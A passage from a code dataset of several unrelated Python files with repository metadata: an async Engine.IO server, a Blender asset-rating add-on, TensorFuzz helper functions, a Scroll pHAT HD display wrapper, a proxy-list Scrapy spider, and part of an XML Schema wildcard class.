    def create_queue(self, *args, **kwargs):
        """Create a queue object using the appropriate async model.
        This is a utility function that applications can use to create a queue
        without having to worry about using the correct call for the selected
        async mode. For asyncio based async modes, this returns an instance of
        ``asyncio.Queue``.
        """
        return asyncio.Queue(*args, **kwargs)
    def get_queue_empty_exception(self):
        """Return the queue empty exception for the appropriate async model.
        This is a utility function that applications can use to work with a
        queue without having to worry about using the correct call for the
        selected async mode. For asyncio based async modes, this returns an
        instance of ``asyncio.QueueEmpty``.
        """
        return asyncio.QueueEmpty
    def create_event(self, *args, **kwargs):
        """Create an event object using the appropriate async model.
        This is a utility function that applications can use to create an
        event without having to worry about using the correct call for the
        selected async mode. For asyncio based async modes, this returns
        an instance of ``asyncio.Event``.
        """
        return asyncio.Event(*args, **kwargs)
    async def _handle_connect(self, environ, transport, b64=False, jsonp_index=None):
        """Handle a client connection request."""
        if self.start_service_task:
            # start the service task to monitor connected clients
            self.start_service_task = False
            self.start_background_task(self._service_task)
        sid = self._generate_id()
        s = asyncio_socket.AsyncSocket(self, sid)
        s.jsonp_index = jsonp_index
        self.sockets[sid] = s
        # The OPEN packet advertises the session id and timing parameters
        # (milliseconds on the wire, seconds internally).
        pkt = packet.Packet(
            packet.OPEN, {'sid': sid,
                          'upgrades': self._upgrades(sid, transport),
                          'pingTimeout': int(self.ping_timeout * 1000),
                          'pingInterval': int(self.ping_interval * 1000)})
        await s.send(pkt)
        ret = await self._trigger_event('connect', sid, environ,
                                        run_async=False)
        if ret is False:
            # A 'connect' handler returning False rejects the client.
            del self.sockets[sid]
            self.logger.warning('Application rejected connection')
            return self._unauthorized()
        if transport == 'websocket':
            ret = await s.handle_get_request(environ)
            if s.closed:
                # websocket connection ended, so we are done
                del self.sockets[sid]
            return ret
        else:
            s.connected = True
            headers = None
            if self.cookie:
                headers = [('Set-Cookie', self.cookie + '=' + sid)]
            try:
                return self._ok(await s.poll(), headers=headers, b64=b64, jsonp_index=jsonp_index)
            except exceptions.QueueEmpty:
                return self._bad_request()
    async def _trigger_event(self, event, *args, **kwargs):
        """Invoke an event handler."""
        run_async = kwargs.pop('run_async', False)
        ret = None
        if event in self.handlers:
            if asyncio.iscoroutinefunction(self.handlers[event]) is True:
                if run_async:
                    return self.start_background_task(self.handlers[event],
                                                      *args)
                else:
                    try:
                        ret = await self.handlers[event](*args)
                    except asyncio.CancelledError: # pragma: no cover
                        pass
                    except:
                        self.logger.exception(event + ' async handler error')
                        if event == 'connect':
                            # if connect handler raised error we reject the
                            # connection
                            return False
            else:
                # Plain (non-coroutine) handler.
                if run_async:
                    async def async_handler():
                        return self.handlers[event](*args)
                    return self.start_background_task(async_handler)
                else:
                    try:
                        ret = self.handlers[event](*args)
                    except:
                        self.logger.exception(event + ' handler error')
                        if event == 'connect':
                            # if connect handler raised error we reject the
                            # connection
                            return False
        return ret
    async def _service_task(self): # pragma: no cover
        """Monitor connected clients and clean up those that time out."""
        while True:
            if len(self.sockets) == 0:
                # nothing to do
                await self.sleep(self.ping_timeout)
                continue
            # go through the entire client list in a ping interval cycle
            sleep_interval = self.ping_timeout / len(self.sockets)
            try:
                # iterate over the current clients
                for socket in self.sockets.copy().values():
                    if not socket.closing and not socket.closed:
                        await socket.check_ping_timeout()
                    await self.sleep(sleep_interval)
            except (SystemExit, KeyboardInterrupt, asyncio.CancelledError):
                self.logger.info('service task canceled')
                break
            except:
                if asyncio.get_event_loop().is_closed():
                    self.logger.info('event loop is closed, exiting service '
                                     'task')
                    break
                # an unexpected exception has occurred, log it and continue
                self.logger.exception('service task exception')
| 43.183445 | 98 | 0.552298 |
48c34a615dcf24b3bdd52bada31e016aa85968d7 | 10,046 | py | Python | release/scripts/addons/blenderkit/ratings.py | simileV/blenderStereo29 | 09b993449aaca671a9eb2a6a22327246936eb3db | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2020-07-20T15:41:58.000Z | 2020-07-20T15:41:58.000Z | release/scripts/addons/blenderkit/ratings.py | ringsce/Rings3D | 8059d1e2460fc8d6f101eff8e695f68a99f6671d | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | release/scripts/addons/blenderkit/ratings.py | ringsce/Rings3D | 8059d1e2460fc8d6f101eff8e695f68a99f6671d | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
from importlib import reload
paths = reload(paths)
utils = reload(utils)
rerequests = reload(rerequests)
tasks_queue = reload(tasks_queue)
else:
from blenderkit import paths, utils, rerequests, tasks_queue
import bpy
import requests, threading
from bpy.props import (
IntProperty,
FloatProperty,
StringProperty,
EnumProperty,
BoolProperty,
PointerProperty,
)
from bpy.types import (
Operator,
Panel,
)
def pretty_print_POST(req):
    """Print a prepared HTTP request (method, URL, headers, body) for debugging."""
    header_block = '\n'.join('{}: {}'.format(name, value)
                             for name, value in req.headers.items())
    request_line = req.method + ' ' + req.url
    print('{}\n{}\n{}\n\n{}'.format(
        '-----------START-----------', request_line, header_block, req.body))
def upload_rating_thread(url, ratings, headers):
    '''Upload ratings from a worker thread, detached from Blender data.'''
    utils.p('upload rating', url, ratings)
    for rating_name, score in ratings:
        # 0 and -1 mean "not rated"; such entries are never uploaded.
        if score in (-1, 0):
            continue
        payload = {"score": score}
        try:
            rerequests.put(url + rating_name + '/', data=payload,
                           verify=True, headers=headers)
        except requests.exceptions.RequestException as e:
            print('ratings upload failed: %s' % str(e))
def send_rating_to_thread_quality(url, ratings, headers):
    '''Sens rating into thread rating, main purpose is for tasks_queue.
    One function per property to avoid lost data due to stashing.'''
    worker = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
    worker.start()
def send_rating_to_thread_work_hours(url, ratings, headers):
    '''Sens rating into thread rating, main purpose is for tasks_queue.
    One function per property to avoid lost data due to stashing.'''
    worker = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
    worker.start()
def upload_review_thread(url, reviews, headers):
    """PUT the review payload to the API (runs in a background thread).

    NOTE(review): request errors are deliberately not caught here -- the
    original exception handler was commented out upstream.
    """
    rerequests.put(url, data=reviews, verify=True, headers=headers)
def get_rating(asset_id):
    """Fetch and print the 'quality' and 'working_hours' ratings for an asset.

    :param asset_id: server-side id of the asset whose ratings are fetched.

    Note: this function isn't used anywhere and should probably get removed.
    """
    user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
    api_key = user_preferences.api_key
    headers = utils.get_headers(api_key)
    # Bug fix: the original body referenced the undefined names `asset`,
    # `r1` and `data`; use the `asset_id` argument and the locals below.
    rl = paths.get_api_url() + 'assets/' + asset_id + '/rating/'
    rtypes = ['quality', 'working_hours']
    for rt in rtypes:
        params = {
            'rating_type': rt
        }
        r = rerequests.get(rl, params=params, verify=True, headers=headers)
        print(r.text)
def update_ratings_quality(self, context):
    """Property-update callback: queue an upload of the quality rating."""
    prefs = bpy.context.preferences.addons['blenderkit'].preferences
    headers = utils.get_headers(prefs.api_key)

    asset = self.id_data
    bkit_ratings = asset.bkit_ratings
    url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'

    # Values at or below 0.1 mean "not rated yet" -- nothing to send.
    if bkit_ratings.rating_quality > 0.1:
        ratings = [('quality', bkit_ratings.rating_quality)]
        tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)),
                             wait=1, only_last=True)
def update_ratings_work_hours(self, context):
    """Property-update callback: queue an upload of the working-hours rating."""
    prefs = bpy.context.preferences.addons['blenderkit'].preferences
    headers = utils.get_headers(prefs.api_key)

    asset = self.id_data
    bkit_ratings = asset.bkit_ratings
    url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'

    if bkit_ratings.rating_work_hours > 0.05:
        ratings = [('working_hours', round(bkit_ratings.rating_work_hours, 1))]
        tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)),
                             wait=1, only_last=True)
def upload_rating(asset):
    """Upload the asset's numeric ratings and textual review to the server.

    Spawns background threads for the network calls and records in the scene
    that the asset has been rated.

    :param asset: a Blender ID datablock carrying `bkit_ratings` and
        an 'asset_data' custom property with server ids.
    """
    user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
    api_key = user_preferences.api_key
    headers = utils.get_headers(api_key)

    bkit_ratings = asset.bkit_ratings
    url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'

    ratings = []
    # Values at or below 0.1 mean "not rated yet".
    if bkit_ratings.rating_quality > 0.1:
        ratings.append(('quality', bkit_ratings.rating_quality))
    if bkit_ratings.rating_work_hours > 0.1:
        ratings.append(('working_hours', round(bkit_ratings.rating_work_hours, 1)))

    thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
    thread.start()

    url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/review'

    reviews = {
        'reviewText': bkit_ratings.rating_compliments,
        'reviewTextProblems': bkit_ratings.rating_problems,
    }
    # Bug fix: the original compared rating_compliments against '' twice, so
    # a review with only the "problems" field filled in was never uploaded.
    if not (bkit_ratings.rating_compliments == '' and bkit_ratings.rating_problems == ''):
        thread = threading.Thread(target=upload_review_thread, args=(url, reviews, headers))
        thread.start()

    # the info that the user rated an item is stored in the scene
    s = bpy.context.scene
    s['assets rated'] = s.get('assets rated', {})
    if bkit_ratings.rating_quality > 0.1 and bkit_ratings.rating_work_hours > 0.1:
        s['assets rated'][asset['asset_data']['assetBaseId']] = True
def get_assets_for_rating():
    '''
    gets assets from scene that could/should be rated by the user.
    TODO this is only a draft.
    '''
    assets = [ob for ob in bpy.context.scene.objects if ob.get('asset_data')]
    assets.extend(mat for mat in bpy.data.materials if mat.get('asset_data'))
    assets.extend(brush for brush in bpy.data.brushes if brush.get('asset_data'))
    return assets
# class StarRatingOperator(bpy.types.Operator):
# """Tooltip"""
# bl_idname = "object.blenderkit_rating"
# bl_label = "Rate the Asset Quality"
# bl_options = {'REGISTER', 'INTERNAL'}
#
# property_name: StringProperty(
# name="Rating Property",
# description="Property that is rated",
# default="",
# )
#
# rating: IntProperty(name="Rating", description="rating value", default=1, min=1, max=10)
#
# def execute(self, context):
# asset = utils.get_active_asset()
# props = asset.bkit_ratings
# props.rating_quality = self.rating
# return {'FINISHED'}
# (identifier, UI label, description) items for an asset-type EnumProperty.
asset_types = (
    ('MODEL', 'Model', 'set of objects'),
    ('SCENE', 'Scene', 'scene'),
    ('MATERIAL', 'Material', 'any .blend Material'),
    ('TEXTURE', 'Texture', 'a texture, or texture set'),
    ('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
    # Typo fix: the description previously read 'addnon'.
    ('ADDON', 'Addon', 'addon'),
)
# TODO drop this operator, not needed anymore.
class UploadRatingOperator(bpy.types.Operator):
    """Upload rating to the web db"""
    bl_idname = "object.blenderkit_rating_upload"
    bl_label = "Send Rating"
    bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}

    def draw(self, context):
        # Shown in the confirmation dialog opened by invoke().
        self.layout.label(text='Rating sent to server. Thanks for rating!')

    def execute(self, context):
        return {'FINISHED'}

    def invoke(self, context, event):
        window_manager = context.window_manager
        upload_rating(utils.get_active_asset())
        return window_manager.invoke_props_dialog(self)
def draw_rating(layout, props, prop_name, name):
    """Draw the star-rating widget for *props* into *layout*.

    *prop_name* and *name* are kept for API compatibility but are currently
    unused: the widget is driven entirely by the 'rating_quality_ui' enum,
    whose items-callback icons 'animate' the stars.
    """
    star_row = layout.row(align=True)
    star_row.prop(props, 'rating_quality_ui', expand=True, icon_only=True, emboss=False)
def register_ratings():
    """Register this module's operator classes with Blender."""
    bpy.utils.register_class(UploadRatingOperator)
def unregister_ratings():
    """Unregister this module's operator classes from Blender."""
    bpy.utils.unregister_class(UploadRatingOperator)
| 33.824916 | 115 | 0.652897 |
16520f666ec99a8f0593e1d72468bbe7c21119a9 | 190 | py | Python | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 1 | 2019-02-11T23:34:04.000Z | 2019-02-11T23:34:04.000Z | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 5 | 2021-01-26T19:53:32.000Z | 2022-03-21T22:23:12.000Z | run_alleles.py | yeastgenome/SGDAllianceData | 473efa14515d10f3aadf7f50d58edb42873176d0 | [
"MIT"
] | 1 | 2020-05-22T16:14:36.000Z | 2020-05-22T16:14:36.000Z | import os
from src.alleles.alleles import get_allele_information
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
if __name__ == "__main__":
    # Script entry point: write allele data relative to this file's directory.
    get_allele_information(THIS_FOLDER)
f7ad3f1afa0487e696f02d356beaf28b21ad6377 | 7,303 | py | Python | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | tensorfuzz/fuzz_utils.py | dlshriver/tensorfuzz | a81df1b9b62f4d3176af35cf545bef16cf65a05f | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for the fuzzer library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random as random
import numpy as np
import scipy
import tensorflow as tf
import tensorfuzz.dataset as mnist
def basic_mnist_input_corpus(choose_randomly=False, data_dir="/tmp/mnist"):
    """Returns the first image and label from MNIST.
    Args:
      choose_randomly: a boolean indicating whether to choose randomly.
      data_dir: a string giving the location of the original MNIST data.
    Returns:
      A single image and a single label.
    """
    dataset = mnist.train(data_dir).cache().shuffle(buffer_size=50000).batch(100).repeat()
    iterator = dataset.make_one_shot_iterator()
    images, integer_labels = iterator.get_next()
    images = tf.reshape(images, [-1, 28, 28, 1])
    # labels = tf.one_hot(integer_labels, 10)
    labels = integer_labels

    with tf.train.MonitoredTrainingSession() as sess:
        image_batch, label_batch = sess.run([images, labels])

    idx = random.choice(range(image_batch.shape[0])) if choose_randomly else 0
    tf.logging.info("Seeding corpus with element at idx: %s", idx)
    return image_batch[idx], label_batch[idx]
def imsave(image, path):
    """Saves an image to a given path.
    This function has the side-effect of writing to disk.
    Args:
      image: The Numpy array representing the image.
      path: A Filepath.
    """
    squeezed = np.squeeze(image)
    with tf.gfile.Open(path, mode="w") as handle:
        scipy.misc.imsave(handle, squeezed)
def build_feed_dict(input_tensors, input_batches):
    """Constructs a feed_dict to pass to the run method of TensorFlow Session.

    In the logic we assume all tensors should have the same batch size, but
    some tensors may have concrete (static) batch dimensions while others do
    not -- especially when constructing the seed corpus -- so numpy inputs are
    tiled up to the largest concrete batch size when needed.

    Args:
      input_tensors: The TF tensors into which we will feed the fuzzed inputs.
      input_batches: Numpy arrays that will be fed into the input tensors.

    Returns:
      The feed_dict described above.
    """
    feed_dict = {}

    # Tiling is only necessary if at least one tensor has a concrete batch size.
    static_bszs = [t.get_shape().as_list()[0] for t in input_tensors]
    should_tile = any(bsz is not None for bsz in static_bszs)
    if should_tile:
        max_tensor_bsz = max(bsz for bsz in static_bszs if bsz is not None)

    for idx in range(min(len(input_tensors), len(input_batches))):
        np_bsz = input_batches[idx].shape[0]
        if should_tile and np_bsz != max_tensor_bsz:
            tf.logging.info(
                "Tiling feed_dict inputs due to concrete batch sizes."
            )
            reps = [max_tensor_bsz // np_bsz] + [1] * len(input_batches[idx].shape[1:])
            input_batches[idx] = np.tile(input_batches[idx], reps)

    # Note that zip truncates to the shorter of input_tensors/input_batches.
    # This is WAI right now, because we sometimes want to store the label for
    # an image classifier for which we don't have a label placeholder in the
    # checkpoint.
    for input_tensor, input_batch in zip(input_tensors, input_batches):
        feed_dict[input_tensor] = input_batch
    return feed_dict
def get_tensors_from_checkpoint(sess, checkpoint_dir):
    """Loads and returns the fuzzing tensors given a session and a directory.

    It's assumed that the checkpoint directory has checkpoints from a
    TensorFlow model with 3 collections:
    1. input_tensors: tensors into which we feed the fuzzed inputs.
    2. coverage_tensors: tensors fetched to compute coverage, which guides
       the fuzzing process.
    3. metadata_tensors: tensors fetched to compute metadata, used for the
       fuzzing objective or to track progress.

    Args:
      sess: a TensorFlow Session object.
      checkpoint_dir: a directory containing the TensorFlow checkpoints.

    Returns:
      A dict mapping 'input'/'coverage'/'metadata' to the tensor lists above.
    """
    candidates = tf.gfile.ListDirectory(checkpoint_dir)
    meta_files = [f for f in candidates if f.endswith(".meta")]
    # Sort the meta files by global step and take the most recent one.
    meta_files.sort(key=lambda f: int(f[: -len(".meta")].split("-")[-1]))
    meta_file = meta_files[-1]

    explicit_meta_path = os.path.join(checkpoint_dir, meta_file)
    explicit_checkpoint_path = explicit_meta_path[: -len(".meta")]
    tf.logging.info("Visualizing checkpoint: %s", explicit_checkpoint_path)

    saver = tf.train.import_meta_graph(
        explicit_meta_path, clear_devices=True
    )
    saver.restore(sess, explicit_checkpoint_path)

    tensor_map = {
        "input": tf.get_collection("input_tensors"),
        "coverage": tf.get_collection("coverage_tensors"),
        "metadata": tf.get_collection("metadata_tensors"),
    }
    return tensor_map
def fetch_function(
    sess, input_tensors, coverage_tensors, metadata_tensors, input_batches
):
    """Fetches from the TensorFlow runtime given inputs.

    Args:
      sess: a TensorFlow Session object.
      input_tensors: TF tensors to which we feed input_batches.
      coverage_tensors: TF tensors we fetch for coverage.
      metadata_tensors: TF tensors we fetch for metadata.
      input_batches: numpy arrays we feed to input_tensors.

    Returns:
      Coverage and metadata as lists of numpy arrays.
    """
    feed_dict = build_feed_dict(input_tensors, input_batches)
    fetched = sess.run(coverage_tensors + metadata_tensors, feed_dict=feed_dict)
    # The first len(coverage_tensors) results are coverage, the rest metadata.
    split = len(coverage_tensors)
    return fetched[:split], fetched[split:]
def build_fetch_function(sess, tensor_map):
    """Constructs fetch function given session and tensors."""

    def fetch(input_batches):
        """The fetch function."""
        return fetch_function(
            sess,
            tensor_map["input"],
            tensor_map["coverage"],
            tensor_map["metadata"],
            input_batches,
        )

    return fetch
| 36.515 | 81 | 0.702999 |
9cc69432736e896a09a76fb0bb6e8505094ac400 | 867 | py | Python | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | library/scrollphathd/__init__.py | mic2100/casper-script | 43841d832317ea6e3c65d52ccacfcf084210395a | [
"MIT"
] | null | null | null | from sys import version_info
from .api.http import start_background_thread, scrollphathd_blueprint
from . import is31fl3731
__version__ = '1.2.0'
display = is31fl3731.ScrollPhatHD(None, gamma_table=is31fl3731.LED_GAMMA)
DISPLAY_HEIGHT = display._height
DISPLAY_WIDTH = display._width
pixel = display.set_pixel
set_pixel = display.set_pixel
set_brightness = display.set_brightness
set_font = display.set_font
show = display.show
scroll = display.scroll
fill = display.fill
clear_rect = display.clear_rect
width = display.width
height = display.height
scroll_to = display.scroll_to
rotate = display.rotate
flip = display.flip
draw_char = display.draw_char
write_string = display.write_string
clear = display.clear
set_graph = display.set_graph
get_buffer_shape = display.get_buffer_shape
get_shape = display.get_shape
set_clear_on_exit = display.set_clear_on_exit
| 26.272727 | 73 | 0.825836 |
6f33080a4f0194534a8e7e00b8c5b21d0a16f4c0 | 2,146 | py | Python | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-fellow | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | 1 | 2020-07-31T21:47:47.000Z | 2020-07-31T21:47:47.000Z | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-fellow | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | 13 | 2020-05-28T00:57:27.000Z | 2020-05-28T14:58:25.000Z | webapi/core/proxy_fetchers/freeproxylistsnet.py | shovradas/proxy-ally | fdecc5d408496ba31aef70da4d17ee5869ed7dc5 | [
"MIT"
] | null | null | null | import scrapy, os, json
from urllib.parse import unquote, urljoin
from urllib.request import pathname2url
import ast
from config import DEBUG
# DEBUG=False
# custom spider having the parse logic
# custom spider having the parse logic
class ProxyScrapSpider(scrapy.Spider):
    name = 'freeproxylistsnet'
    page_number = 2  # next page to request (page 1 is the start URL)
    max_page = 5

    def start_requests(self):
        # In DEBUG mode parse a saved local copy instead of hitting the site.
        if DEBUG:
            url = urljoin('file:', pathname2url(f'{os.getcwd()}/core/proxy_fetchers/providers_offline/freeproxylistsnet.html'))
            yield scrapy.Request(url, self.parse)
        else:
            yield scrapy.Request('http://www.freeproxylists.net/', self.parse)

    def parse(self, response):
        grid = response.xpath('//table[@class="DataGrid"]')[0]
        for row in grid.xpath('tr'):
            cells = row.xpath('td')
            if len(cells) > 1:
                encoded = cells[0].xpath('script/text()').extract_first()
                if encoded:
                    # The IP is URL-encoded inside an inline <script>; decode
                    # it and re-parse to pull the address out of the <a> tag.
                    decoded = scrapy.Selector(text=unquote(encoded.split('"')[1]))
                    yield {
                        'ip': decoded.xpath('//a/text()').extract_first(),
                        'port': int(cells[1].xpath('text()').extract_first()),
                        'https': cells[2].xpath('text()').extract_first()
                    }

        if not DEBUG:
            next_page = f'http://www.freeproxylists.net/?page={ProxyScrapSpider.page_number}'
            if ProxyScrapSpider.page_number <= ProxyScrapSpider.max_page:
                ProxyScrapSpider.page_number += 1
                yield response.follow(next_page, callback=self.parse)
def fetch(config=None):
    """Run the spider in a subprocess and return the scraped proxy list.

    :param config: optional dict with a 'downloadDelay' entry used to throttle
        requests. Defaults to no delay, so the function can also be called
        without arguments (bug fix: the original required a config argument
        but the __main__ block below called ``fetch()``, raising TypeError).
    :return: a list of proxy dicts parsed from the subprocess output.
    """
    if config is None:
        config = {'downloadDelay': 0}
    ProxyScrapSpider.custom_settings = {
        'DOWNLOAD_DELAY': config['downloadDelay']
    }
    # e.g. core.proxy_fetchers.freeproxylistsnet.ProxyScrapSpider
    spider = '.'.join([__name__, ProxyScrapSpider.__name__])
    # The spider runs in a separate Python process; its stdout is a Python
    # literal that we parse back into a list.
    data = os.popen(f'python {os.getcwd()}/core/proxy_fetchers/fetch.py {spider}').read()
    return ast.literal_eval(data.strip())


if __name__ == '__main__':
    data = fetch()
    print(json.dumps(data, indent=4), f'count: {len(data)}')
64c20fe17b9099865ec8c5f91491b114c67a3852 | 32,993 | py | Python | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | xmlschema/validators/wildcards.py | jonringer/xmlschema | 9645bb52ae693b45f494af41af144a2a1f0e64d8 | [
"MIT"
] | null | null | null | #
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains classes for XML Schema wildcards.
"""
from ..exceptions import XMLSchemaValueError
from ..namespaces import XSI_NAMESPACE
from ..qnames import XSD_ANY, XSD_ANY_ATTRIBUTE, XSD_OPEN_CONTENT, \
XSD_DEFAULT_OPEN_CONTENT, XSI_TYPE, get_namespace
from ..xpath import XMLSchemaProxy, ElementPathMixin
from .xsdbase import ValidationMixin, XsdComponent, ParticleMixin
class XsdWildcard(XsdComponent, ValidationMixin):
    """Base class for XSD wildcards (xs:any / xs:anyAttribute).

    Stores the wildcard's namespace constraint (either an allowed-namespace
    list in `namespace` or, for XSD 1.1, a forbidden list in `not_namespace`
    plus forbidden names in `not_qname`) and the processContents policy, and
    implements the constraint algebra (restriction, union, intersection).
    """
    names = ()
    # Default namespace constraint: any namespace is allowed.
    namespace = ('##any',)
    # XSD 1.1 negative constraints, parsed from notNamespace / notQName.
    not_namespace = ()
    not_qname = ()
    process_contents = 'strict'

    def __repr__(self):
        if self.not_namespace:
            return '%s(not_namespace=%r, process_contents=%r)' % (
                self.__class__.__name__, self.not_namespace, self.process_contents
            )
        else:
            return '%s(namespace=%r, process_contents=%r)' % (
                self.__class__.__name__, self.namespace, self.process_contents
            )

    def _parse(self):
        super(XsdWildcard, self)._parse()

        # Parse namespace and processContents
        namespace = self.elem.get('namespace', '##any').strip()
        if namespace == '##any':
            pass
        elif not namespace:
            self.namespace = []  # an empty value means no namespace allowed!
        elif namespace == '##other':
            self.namespace = [namespace]
        elif namespace == '##local':
            self.namespace = ['']
        elif namespace == '##targetNamespace':
            self.namespace = [self.target_namespace]
        else:
            # A whitespace-separated list of URIs and/or the two ## keywords.
            self.namespace = []
            for ns in namespace.split():
                if ns == '##local':
                    self.namespace.append('')
                elif ns == '##targetNamespace':
                    self.namespace.append(self.target_namespace)
                elif ns.startswith('##'):
                    self.parse_error("wrong value %r in 'namespace' attribute" % ns)
                else:
                    self.namespace.append(ns)

        process_contents = self.elem.get('processContents', 'strict')
        if process_contents == 'strict':
            pass
        elif process_contents not in ('lax', 'skip'):
            self.parse_error("wrong value %r for 'processContents' "
                             "attribute" % self.process_contents)
        else:
            self.process_contents = process_contents

    def _parse_not_constraints(self):
        # XSD 1.1 only: parse the notNamespace / notQName attributes.
        if 'notNamespace' not in self.elem.attrib:
            pass
        elif 'namespace' in self.elem.attrib:
            self.parse_error("'namespace' and 'notNamespace' attributes are mutually exclusive")
        else:
            self.namespace = []
            self.not_namespace = []
            for ns in self.elem.attrib['notNamespace'].strip().split():
                if ns == '##local':
                    self.not_namespace.append('')
                elif ns == '##targetNamespace':
                    self.not_namespace.append(self.target_namespace)
                elif ns.startswith('##'):
                    self.parse_error("wrong value %r in 'notNamespace' attribute" % ns)
                else:
                    self.not_namespace.append(ns)

        # Parse notQName attribute
        if 'notQName' not in self.elem.attrib:
            return

        not_qname = self.elem.attrib['notQName'].strip().split()

        # Attribute wildcards may only use the '##defined' keyword; element
        # wildcards may also use '##definedSibling'.
        if isinstance(self, XsdAnyAttribute) and \
                not all(not s.startswith('##') or s == '##defined'
                        for s in not_qname) or \
                not all(not s.startswith('##') or s in {'##defined', '##definedSibling'}
                        for s in not_qname):
            self.parse_error("wrong value for 'notQName' attribute")
            return

        try:
            names = [x if x.startswith('##') else self.schema.resolve_qname(x, False)
                     for x in not_qname]
        except KeyError as err:
            self.parse_error("unmapped QName in 'notQName' attribute: %s" % str(err))
            return
        except ValueError as err:
            self.parse_error("wrong QName format in 'notQName' attribute: %s" % str(err))
            return

        if self.not_namespace:
            if any(not x.startswith('##') for x in names) and \
                    all(get_namespace(x) in self.not_namespace
                        for x in names if not x.startswith('##')):
                self.parse_error("the namespace of each QName in notQName "
                                 "is allowed by notNamespace")
        elif any(not self.is_namespace_allowed(get_namespace(x))
                 for x in names if not x.startswith('##')):
            self.parse_error("names in notQName must be in namespaces that are allowed")

        self.not_qname = names

    @property
    def built(self):
        # A wildcard has no subcomponents to build.
        return True

    def is_matching(self, name, default_namespace=None, **kwargs):
        # Matches on namespace only: an extended name ('{ns}local') is checked
        # against the namespace constraint; an unprefixed name is checked
        # against the empty namespace and, if given, the default namespace.
        if name is None:
            return False
        elif not name or name[0] == '{':
            return self.is_namespace_allowed(get_namespace(name))
        elif default_namespace is None:
            return self.is_namespace_allowed('')
        else:
            return self.is_namespace_allowed('') or \
                self.is_namespace_allowed(default_namespace)

    def is_namespace_allowed(self, namespace):
        # NOTE: the XSI namespace is always allowed for positive constraints.
        if self.not_namespace:
            return namespace not in self.not_namespace
        elif '##any' in self.namespace or namespace == XSI_NAMESPACE:
            return True
        elif '##other' in self.namespace:
            return namespace and namespace != self.target_namespace
        else:
            return namespace in self.namespace

    def deny_namespaces(self, namespaces):
        # True if every namespace in *namespaces* is rejected by this wildcard.
        if self.not_namespace:
            return all(x in self.not_namespace for x in namespaces)
        elif '##any' in self.namespace:
            return False
        elif '##other' in self.namespace:
            return all(x == self.target_namespace for x in namespaces)
        else:
            return all(x not in self.namespace for x in namespaces)

    def deny_qnames(self, names):
        # True if every extended name in *names* is rejected by this wildcard.
        if self.not_namespace:
            return all(x in self.not_qname or get_namespace(x) in self.not_namespace
                       for x in names)
        elif '##any' in self.namespace:
            return all(x in self.not_qname for x in names)
        elif '##other' in self.namespace:
            return all(x in self.not_qname or get_namespace(x) == self.target_namespace
                       for x in names)
        else:
            return all(x in self.not_qname or get_namespace(x) not in self.namespace
                       for x in names)

    def is_restriction(self, other, check_occurs=True):
        # Checks whether this wildcard is a valid restriction of *other*:
        # occurrence bounds, processContents strength, notQName subset and
        # namespace-constraint subset are verified in turn.
        if check_occurs and isinstance(self, ParticleMixin) \
